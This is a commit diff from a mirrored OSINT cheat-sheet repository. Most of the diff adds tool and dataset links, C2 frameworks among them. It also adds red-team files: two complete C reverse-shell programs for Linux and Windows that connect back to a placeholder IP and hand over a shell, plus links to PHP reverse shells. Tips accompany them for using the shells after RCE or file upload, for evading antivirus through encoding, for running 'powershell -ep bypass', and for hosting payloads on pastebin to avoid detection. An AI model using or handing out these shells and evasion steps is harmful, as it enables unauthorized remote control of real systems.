mirror of
https://github.com/Jieyab89/OSINT-Cheat-sheet.git
synced 2025-12-05 20:40:30 -08:00
added resouces and scripts
This commit is contained in:
@@ -151,6 +151,7 @@ Be carefull using this tool
|
||||
- [Hoaxy](https://hoaxy.osome.iu.edu/)
|
||||
- [Offensive OSINT](https://www.os-surveillance.io/#choose-plan)
|
||||
- [botsentinel](https://botsentinel.com/dashboard)
|
||||
- [keyhole](https://keyhole.co/)
|
||||
|
||||
# Collection Dataset
|
||||
|
||||
@@ -194,6 +195,7 @@ Be carefull using this tool
|
||||
- [BNN ID](https://puslitdatin.bnn.go.id/portfolio/data-statistik-kasus-narkoba/)
|
||||
- [Microsoft Building Dataset](https://planetarycomputer.microsoft.com/dataset/ms-buildings)
|
||||
- [huggingface](https://huggingface.co/)
|
||||
- [goodstats ID](https://goodstats.id/)
|
||||
|
||||
# Forums & Sites
|
||||
|
||||
@@ -330,6 +332,7 @@ Site and forums OSINT community arround world
|
||||
|
||||
Hastag and keyword analysis in search engine, social media or other platform (Text Intel)
|
||||
|
||||
- [keyhole](https://keyhole.co/)
|
||||
- [brandmentions](https://app.brandmentions.com/)
|
||||
- [wordtracker](https://www.wordtracker.com/)
|
||||
- [keywordtool](https://keywordtool.io/)
|
||||
@@ -2178,7 +2181,7 @@ Browser plugin that allows you to watch YouTube videos frame by frame.
|
||||
- [unwiredlabs](https://unwiredlabs.com/products)
|
||||
- [copernix](https://copernix.io/)
|
||||
- [skydb DB for building](https://www.skydb.net/)
|
||||
- [dataspace](https://browser.dataspace.copernicus.eu/)
|
||||
- [dataspace copernicus EU](https://browser.dataspace.copernicus.eu/)
|
||||
- [openinframap](https://openinframap.org/#2/57.92/72.82/L,O)
|
||||
- [openseamap](https://map.openseamap.org/)
|
||||
- [openstreetbrowser](https://openstreetbrowser.org/)
|
||||
@@ -2689,6 +2692,7 @@ Social Network and blogging
|
||||
- [immuniweb](https://www.immuniweb.com/darkweb/)
|
||||
- [darknetlive](https://darknetlive.com/onions)
|
||||
- [ransomwatch](https://ransomwatch.telemetry.ltd/#/)
|
||||
- [watchguard ransomtracker](https://www.watchguard.com/wgrd-security-hub/ransomware-tracker)
|
||||
- [Ahmia Onion Site](http://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion/)
|
||||
- [Haystak Onion Site](http://haystak5njsmn2hqkewecpaxetahtwhsbsa64jom2k22z5afxhnpxfid.onion/)
|
||||
- [Dark Search Onion Site](http://darkschn4iw2hxvpv2vy2uoxwkvs2padb56t3h4wqztre6upoc5qwgid.onion)
|
||||
@@ -3585,6 +3589,7 @@ Awesome Burpsuite Extension
|
||||
C2 & C4
|
||||
|
||||
- [cobaltstrike](https://www.cobaltstrike.com/)
|
||||
- [bruteratel C4](https://bruteratel.com/tabs/tutorials/)
|
||||
- [Ninja](https://github.com/ahmedkhlief/Ninja)
|
||||
- [Poweshell Empire](https://bc-security.gitbook.io/empire-wiki)
|
||||
- [Metasploit Framework](https://github.com/rapid7/metasploit-framework)
|
||||
@@ -3857,6 +3862,7 @@ Resources and collection for your make tool OSINT
|
||||
|
||||
# OSINT Branding & Verify
|
||||
|
||||
- [keyhole](https://keyhole.co/)
|
||||
- [Trus Pilot](https://www.trustpilot.com/)
|
||||
- [Google Alert](https://www.google.com/alerts)
|
||||
- [White Pages](https://www.whitepages.com/)
|
||||
|
||||
@@ -4,7 +4,7 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
|
||||
|
||||
1. Make sure the target has internet access (internet access opened)
|
||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||
3. Encode your script using base64 and then decode it 3.
|
||||
3. Encode your script using base64 and then decode it
|
||||
4. Encode your script using url encode
|
||||
|
||||
## Script 1
|
||||
|
||||
84
Script/Red Team/C Script/Reverse-shell.md
Normal file
84
Script/Red Team/C Script/Reverse-shell.md
Normal file
@@ -0,0 +1,84 @@
|
||||
# TIPS
|
||||
|
||||
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
|
||||
|
||||
1. Make sure the target has internet access (internet access opened)
|
||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||
3. Encode your script using base64 and then decode it
|
||||
4. Encode your script using url encode
|
||||
5. Check the compiler
|
||||
|
||||
|
||||
## C script spawning shell
|
||||
|
||||
``` Linux
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
int main(void){
|
||||
int port = 4444;
|
||||
struct sockaddr_in revsockaddr;
|
||||
|
||||
int sockt = socket(AF_INET, SOCK_STREAM, 0);
|
||||
revsockaddr.sin_family = AF_INET;
|
||||
revsockaddr.sin_port = htons(port);
|
||||
revsockaddr.sin_addr.s_addr = inet_addr("<IP>");
|
||||
|
||||
connect(sockt, (struct sockaddr *) &revsockaddr,
|
||||
sizeof(revsockaddr));
|
||||
dup2(sockt, 0);
|
||||
dup2(sockt, 1);
|
||||
dup2(sockt, 2);
|
||||
|
||||
char * const argv[] = {"sh", NULL};
|
||||
execvp("sh", argv);
|
||||
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
## C spawning cmd
|
||||
|
||||
```Windows
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
int main(void){
|
||||
int port = 4444;
|
||||
struct sockaddr_in revsockaddr;
|
||||
|
||||
int sockt = socket(AF_INET, SOCK_STREAM, 0);
|
||||
revsockaddr.sin_family = AF_INET;
|
||||
revsockaddr.sin_port = htons(port);
|
||||
revsockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
|
||||
|
||||
connect(sockt, (struct sockaddr *) &revsockaddr,
|
||||
sizeof(revsockaddr));
|
||||
dup2(sockt, 0);
|
||||
dup2(sockt, 1);
|
||||
dup2(sockt, 2);
|
||||
|
||||
char * const argv[] = {"cmd", NULL};
|
||||
execvp("cmd", argv);
|
||||
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
*Pro tips
|
||||
|
||||
- If you was gett the shell, change to powershell, you can run
|
||||
|
||||
```
|
||||
powershell -ep bypass
|
||||
```
|
||||
21
Script/Red Team/Php scripts/Revershe-shell.md
Normal file
21
Script/Red Team/Php scripts/Revershe-shell.md
Normal file
@@ -0,0 +1,21 @@
|
||||
# TIPS
|
||||
|
||||
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
|
||||
|
||||
1. Make sure the target has internet access (internet access opened)
|
||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||
3. Encode your script using base64 and then decode it
|
||||
4. Encode your script using url encode
|
||||
5. Check the compiler
|
||||
|
||||
## Php spawning cmd
|
||||
|
||||
```Windows
|
||||
https://pastebin.com/bFqVuGwv
|
||||
```
|
||||
|
||||
## Php spawning bash
|
||||
|
||||
```Linux
|
||||
https://pastebin.com/QsSKm2F1
|
||||
```
|
||||
@@ -4,8 +4,9 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
|
||||
|
||||
1. Make sure the target has internet access (internet access opened)
|
||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||
3. Encode your script using base64 and then decode it 3.
|
||||
3. Encode your script using base64 and then decode it
|
||||
4. Encode your script using url encode
|
||||
5. Check the compiler
|
||||
|
||||
## Script 1
|
||||
|
||||
|
||||
@@ -1,3 +1,16 @@
|
||||
# Red Teaming
|
||||
|
||||
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
|
||||
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
|
||||
|
||||
## Tips Reverse Shell
|
||||
|
||||
1. Check the operating system target
|
||||
2. Check the network or internet access on the target (internet access opened)
|
||||
3. Cehck the vuln, you can check it by run the command like sleep, delay or trying to wget on your local machine
|
||||
4. Check is it a sandbox like in a container? Or directly to the operating system. If it's a container then you have to bypass
|
||||
5. Check the installed software on the target
|
||||
6. Check the compiler on the target
|
||||
7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others.
|
||||
8. Change the port listener to bigger
|
||||
|
||||
## Soon will added (tamplate )
|
||||
@@ -1,6 +1,7 @@
|
||||
# Awesome Collection Sentinel Script
|
||||
|
||||
- [sentinel collection script](https://custom-scripts.sentinel-hub.com/)
|
||||
- [sentinel custom script Github](https://github.com/sentinel-hub/custom-scripts)
|
||||
|
||||
# Guide
|
||||
|
||||
|
||||
@@ -48,6 +48,10 @@ If you want change the repo for web based and create like node, data list, searc
|
||||
|
||||
# Script
|
||||
|
||||
## Readme
|
||||
|
||||
*Notes for script: To avoid AV detection and abusive access to your computer, you can publish your scripts via pastebin, ghostbin or others.
|
||||
|
||||
## Format
|
||||
|
||||
- Decide what script you're creating and what it's for.
|
||||
@@ -67,3 +71,5 @@ Red Team - Python Scripts
|
||||
>
|
||||
|
||||
or you can also create new folder on this script path
|
||||
|
||||
*Notes for script: To avoid AV detection and abusive access to your computer, you can publish your scripts via pastebin, ghostbin or others.
|
||||
Reference in New Issue
Block a user